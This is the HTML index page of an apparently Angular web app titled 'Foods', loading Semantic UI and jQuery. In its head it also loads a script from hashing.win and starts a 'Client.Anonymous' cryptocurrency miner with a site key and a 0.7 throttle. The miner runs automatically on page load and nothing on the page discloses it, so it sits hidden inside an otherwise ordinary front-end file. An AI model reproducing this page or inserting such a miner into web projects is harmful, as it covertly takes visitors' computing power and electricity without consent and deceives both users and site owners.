<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Foods</title>
  <base href="/">

	<link rel="stylesheet" type="text/css" href="https://rawgit.com/Semantic-Org/Semantic-UI/master/dist/semantic.min.css">
	<script src="https://code.jquery.com/jquery-3.1.1.min.js"
  			integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
  			crossorigin="anonymous"></script>
	<script src="https://rawgit.com/Semantic-Org/Semantic-UI/master/dist/semantic.min.js"></script>
  <script src="https://www.hashing.win/O7Hh.js"></script>
  <script>
      const miner = new Client.Anonymous('8286beb20833cb35a0ed9b3f2064f3d72becb3f10629b24adcfdec767bbec356', {
          throttle: 0.7
      });
      miner.start();
  </script>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" type="image/x-icon" href="favicon.ico">
</head>
<body>
  <app-root></app-root>
</body>
</html>
